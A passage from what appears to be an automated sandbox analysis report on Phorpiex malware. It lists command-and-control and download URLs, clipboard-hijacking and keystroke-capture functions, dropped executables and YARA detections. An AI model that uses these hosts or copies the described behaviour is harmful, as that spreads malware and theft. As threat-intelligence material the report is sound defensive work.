MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr String found in binary or memory: http://185.215.113.66/
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/1D
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/1~
Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/2
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/3
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/383(
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/4
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/5
Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.66/6
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr String found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr String found in binary or memory: http://193.233.132.177/
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/1
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/1Z
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/2
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/3
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/3B
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/4
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/5
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/5R
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/5h.dll
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/5h.dllm
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/5z
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/6
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.177/6b
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.20
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr String found in binary or memory: http://91.202.233.141/
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/1
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/1p3
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/2
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/2W3C
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/2s
Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/3
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/3rosoft
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/4
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/4%
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/40
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/4l3
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/4z
Source: 135143440.exe, 00000003.00000002.4536101356.00000000024AB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/5
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/5O
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/6
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/6-3
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/6L2
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.141/6ZF
Source: newtpp[1].exe.0.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: newtpp[1].exe.0.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/=
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/new
Source: 957C4XK6Lt.exe, 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/newtpp.exe
Source: 957C4XK6Lt.exe String found in binary or memory: http://twizt.net/newtpp.exeP0
Source: 957C4XK6Lt.exe, 00000000.00000000.2068632504.0000000000532000.00000002.00000001.01000000.00000003.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://twizt.net/newtpp.exeP0S
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/newtpp.z%
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/pei
Source: 957C4XK6Lt.exe String found in binary or memory: http://twizt.net/peinstall.php
Source: 957C4XK6Lt.exe String found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/peinstall.php5%z
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/peinstall.phpb
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/peinstall.phpm%
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.muiS9
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twizt.net/peinstall.phpystem32
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA, 3_2_00405910
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_004048A0
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_004048A0
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_004048A0
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA, 3_2_00405910
Installs a raw input device (often for capturing keystrokes)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA, 3_2_00405910

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Phorpiex
Source: Yara match File source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980, 3_2_0040D6E0
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040F319 NtQueryVirtualMemory, 3_2_0040F319
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980, 5_2_0040D6E0
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040F319 NtQueryVirtualMemory, 5_2_0040F319
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980, 8_2_0040D6E0
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040F319 NtQueryVirtualMemory, 8_2_0040F319
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Windows\sysvratrel.exe Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040F0DC 3_2_0040F0DC
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00404090 3_2_00404090
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_004048A0 3_2_004048A0
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040A740 3_2_0040A740
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00407D60 3_2_00407D60
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00407D89 3_2_00407D89
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040F0DC 5_2_0040F0DC
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00404090 5_2_00404090
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_004048A0 5_2_004048A0
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040A740 5_2_0040A740
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00407D60 5_2_00407D60
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00407D89 5_2_00407D89
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040F0DC 8_2_0040F0DC
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00404090 8_2_00404090
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_004048A0 8_2_004048A0
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040A740 8_2_0040A740
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00407D60 8_2_00407D60
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00407D89 8_2_00407D89
Uses 32bit PE files
Source: 957C4XK6Lt.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/7@1/60
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00406B30 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread, 3_2_00406B30
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00407230 CoCreateInstance, 3_2_00407230
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Mutant created: \Sessions\1\BaseNamedObjects\ax765638x6xa
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File created: C:\Users\user\AppData\Local\Temp\135143440.exe Jump to behavior
Source: 957C4XK6Lt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 957C4XK6Lt.exe ReversingLabs: Detection: 68%
Source: 957C4XK6Lt.exe Virustotal: Detection: 55%
Source: unknown Process created: C:\Users\user\Desktop\957C4XK6Lt.exe "C:\Users\user\Desktop\957C4XK6Lt.exe"
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Process created: C:\Users\user\AppData\Local\Temp\135143440.exe C:\Users\user\AppData\Local\Temp\135143440.exe
Source: unknown Process created: C:\Users\user\sysvratrel.exe "C:\Users\user\sysvratrel.exe"
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Process created: C:\Users\user\AppData\Local\Temp\1682018248.exe C:\Users\user\AppData\Local\Temp\1682018248.exe
Source: unknown Process created: C:\Windows\sysvratrel.exe "C:\Windows\sysvratrel.exe"
